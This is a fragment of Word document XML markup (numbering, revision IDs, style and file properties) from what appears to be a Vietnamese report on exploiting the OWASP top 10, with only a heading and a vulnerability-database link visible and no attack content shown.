                          <w:proofErr w:type="gramEnd"/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gram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3901" w14:textId="77777777" w:rsidR="00AF6EEC" w:rsidRDefault="00AF6EEC" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="58C315F3" w14:textId="77777777" w:rsidR="00AF6EEC" w:rsidRDefault="00AF6EEC" w:rsidP="00572592">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w14:paraId="2A24C2AB" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB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Ghi nội dung công việc, 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49B27BA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B403B0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B403B0">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> Khai thác top 10 owasp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CD71F1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3EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADD430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155D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EE2F2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5948"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B784B2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C46883"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6178A2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4F65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53CE9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3F3E52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE300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2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="124087774">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="35199624">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="452286446">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="164320764">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1121531193">
    <w:abstractNumId w:val="14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7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="361394383">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1358434028">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1267690456">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="484510154">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1654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41136">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1163662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1593736">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="163460349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18E5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654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5B0C"/>
    <w:rsid w:val="000D7FE8"/>
    <w:rsid w:val="000E0D2D"/>
    <w:rsid w:val="000E4826"/>
    <w:rsid w:val="000E4CA9"/>
    <w:rsid w:val="000E5278"/>
    <w:rsid w:val="000F0F18"/>
    <w:rsid w:val="000F1EF1"/>
    <w:rsid w:val="000F297F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6170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6222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6F80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69DD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81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15D88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673FF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6F4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417"/>
    <w:rsid w:val="003C28D4"/>
    <w:rsid w:val="003C3262"/>
    <w:rsid w:val="003C4779"/>
    <w:rsid w:val="003C4927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3F7842"/>
    <w:rsid w:val="004012AF"/>
    <w:rsid w:val="0040159A"/>
    <w:rsid w:val="0040417A"/>
    <w:rsid w:val="00407369"/>
    <w:rsid w:val="00411B96"/>
    <w:rsid w:val="004152D9"/>
    <w:rsid w:val="00416CD0"/>
    <w:rsid w:val="00421522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47F0"/>
    <w:rsid w:val="004D5E61"/>
    <w:rsid w:val="004D6415"/>
    <w:rsid w:val="004D661A"/>
    <w:rsid w:val="004D6DC5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3D"/>
    <w:rsid w:val="004E77B6"/>
    <w:rsid w:val="004F0772"/>
    <w:rsid w:val="004F0FB0"/>
    <w:rsid w:val="004F174C"/>
    <w:rsid w:val="004F2D6C"/>
    <w:rsid w:val="004F4BF1"/>
    <w:rsid w:val="004F52A8"/>
    <w:rsid w:val="004F56EE"/>
    <w:rsid w:val="004F64FD"/>
    <w:rsid w:val="004F664D"/>
    <w:rsid w:val="004F7E17"/>
    <w:rsid w:val="005017F5"/>
    <w:rsid w:val="0050210C"/>
    <w:rsid w:val="005067D5"/>
    <w:rsid w:val="00506B09"/>
    <w:rsid w:val="00506F45"/>
    <w:rsid w:val="00511406"/>
    <w:rsid w:val="005140B4"/>
    <w:rsid w:val="005171F1"/>
    <w:rsid w:val="005173B9"/>
    <w:rsid w:val="0052075B"/>
    <w:rsid w:val="0052292D"/>
    <w:rsid w:val="00524081"/>
    <w:rsid w:val="0052587B"/>
    <w:rsid w:val="00526F7F"/>
    <w:rsid w:val="0053014B"/>
    <w:rsid w:val="005317F6"/>
    <w:rsid w:val="00532A9C"/>
    <w:rsid w:val="00533EBA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16C0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3C9B"/>
    <w:rsid w:val="00574541"/>
    <w:rsid w:val="005767A1"/>
    <w:rsid w:val="00583635"/>
    <w:rsid w:val="0058369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36E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11BC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158"/>
    <w:rsid w:val="00694787"/>
    <w:rsid w:val="00694EB5"/>
    <w:rsid w:val="006951FE"/>
    <w:rsid w:val="00695D94"/>
    <w:rsid w:val="00696078"/>
    <w:rsid w:val="006A01B0"/>
    <w:rsid w:val="006A236D"/>
    <w:rsid w:val="006A2C74"/>
    <w:rsid w:val="006A4903"/>
    <w:rsid w:val="006A5D16"/>
    <w:rsid w:val="006A5E62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5BFB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265C3"/>
    <w:rsid w:val="00736266"/>
    <w:rsid w:val="007404DA"/>
    <w:rsid w:val="0074068E"/>
    <w:rsid w:val="00740CA9"/>
    <w:rsid w:val="00743947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101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6252"/>
    <w:rsid w:val="007F7113"/>
    <w:rsid w:val="0080049E"/>
    <w:rsid w:val="00800FF6"/>
    <w:rsid w:val="0080163D"/>
    <w:rsid w:val="008016FC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6DE3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92A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C4E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6251"/>
    <w:rsid w:val="00967D08"/>
    <w:rsid w:val="00967E9D"/>
    <w:rsid w:val="00967FF5"/>
    <w:rsid w:val="00970612"/>
    <w:rsid w:val="00970FC9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61DD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02E9"/>
    <w:rsid w:val="009E1C25"/>
    <w:rsid w:val="009E35C6"/>
    <w:rsid w:val="009E588C"/>
    <w:rsid w:val="009E5CA2"/>
    <w:rsid w:val="009F00F9"/>
    <w:rsid w:val="009F050A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703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6EEC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307"/>
    <w:rsid w:val="00B26F89"/>
    <w:rsid w:val="00B3057B"/>
    <w:rsid w:val="00B3169C"/>
    <w:rsid w:val="00B31A85"/>
    <w:rsid w:val="00B35CBF"/>
    <w:rsid w:val="00B372F3"/>
    <w:rsid w:val="00B37F61"/>
    <w:rsid w:val="00B403B0"/>
    <w:rsid w:val="00B415AB"/>
    <w:rsid w:val="00B418C6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59CF"/>
    <w:rsid w:val="00B56AFE"/>
    <w:rsid w:val="00B5787E"/>
    <w:rsid w:val="00B60C31"/>
    <w:rsid w:val="00B660DD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3F8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1499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E5D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7C3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90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EC"/>
    <w:rsid w:val="00CD71F1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0AB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AD6"/>
    <w:rsid w:val="00DC7B13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85C"/>
    <w:rsid w:val="00DE2E33"/>
    <w:rsid w:val="00DE52B6"/>
    <w:rsid w:val="00DE5BA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65D6"/>
    <w:rsid w:val="00E07644"/>
    <w:rsid w:val="00E10038"/>
    <w:rsid w:val="00E10803"/>
    <w:rsid w:val="00E11AC1"/>
    <w:rsid w:val="00E11B3F"/>
    <w:rsid w:val="00E128C9"/>
    <w:rsid w:val="00E22E6D"/>
    <w:rsid w:val="00E23DA3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5F2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3EE"/>
    <w:rsid w:val="00EC28BA"/>
    <w:rsid w:val="00EC3384"/>
    <w:rsid w:val="00EC36B0"/>
    <w:rsid w:val="00EC4460"/>
    <w:rsid w:val="00EC544C"/>
    <w:rsid w:val="00EC69FA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40A9"/>
    <w:rsid w:val="00EE72EC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0D1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279"/>
    <w:rsid w:val="00F224F6"/>
    <w:rsid w:val="00F22837"/>
    <w:rsid w:val="00F22ABB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6AC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178"/>
    <w:rsid w:val="00F77DB3"/>
    <w:rsid w:val="00F80E48"/>
    <w:rsid w:val="00F8326F"/>
    <w:rsid w:val="00F84406"/>
    <w:rsid w:val="00F84456"/>
    <w:rsid w:val="00F8653C"/>
    <w:rsid w:val="00F8656D"/>
    <w:rsid w:val="00F86ADA"/>
    <w:rsid w:val="00F86CE9"/>
    <w:rsid w:val="00F87054"/>
    <w:rsid w:val="00F92E2E"/>
    <w:rsid w:val="00F93291"/>
    <w:rsid w:val="00F93BD4"/>
    <w:rsid w:val="00F942F4"/>
    <w:rsid w:val="00F94BF8"/>
    <w:rsid w:val="00F94EFC"/>
    <w:rsid w:val="00F96E43"/>
    <w:rsid w:val="00FA0470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5B7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AB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fontstyle01">
    <w:name w:val="fontstyle01"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C5BFB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6C5BFB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sca.analysiscenter.veracode.com/vulnerability-database/security/arbitrary-code-execution/python/sid-22250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9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53</cp:revision>
  <cp:lastPrinted>2023-03-29T06:47:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-11T04:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-04T05:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>